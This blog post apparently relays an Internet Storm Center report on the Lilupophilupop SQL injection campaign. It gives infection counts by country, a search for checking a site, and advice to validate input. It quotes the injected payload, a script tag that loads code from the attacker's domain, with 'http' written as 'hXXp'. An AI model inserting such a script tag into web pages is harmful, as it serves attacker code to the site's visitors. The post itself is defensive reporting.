A month ago Internet Storm Center (ISC) reported that Lilupophilupop is infecting web pages by injecting a code string in them. The string that is injected is the following: “></title><script src=”hXXp://lilupophilupop.com/sl.php”></script>. hXXp is actually http but we replaced it to avoid any issues. If your page was injected with that string it means you have a coding issue and to avoid it you need to validate input, all parameters your application accepts. Now, a month later, about a million pages are infected by Lilupophilupop with SQL injection. To check a domain if it is infected, google “<script src=”http://lilupophilupop.com/” site:the domain you are checking. For example you can check if this site is infected with the following search “<script src=”http://lilupophilupop.com/” site:michalisnicolaides.com.

Most infected websites belong to Netherlands (have a .nl extension) and are about 123000. In the second place we have about 68000 fr sites followed by 56000 uk sites. The number of infected pages increases and it is mostly based on the ignorance of the web developers. Sadly, most of the web developers don’t pay attention to the security of the systems and applications they create. This allows attackers to exploit the security holes and have such results.

Source: [ISC]

Lilupophilupop infected one million pages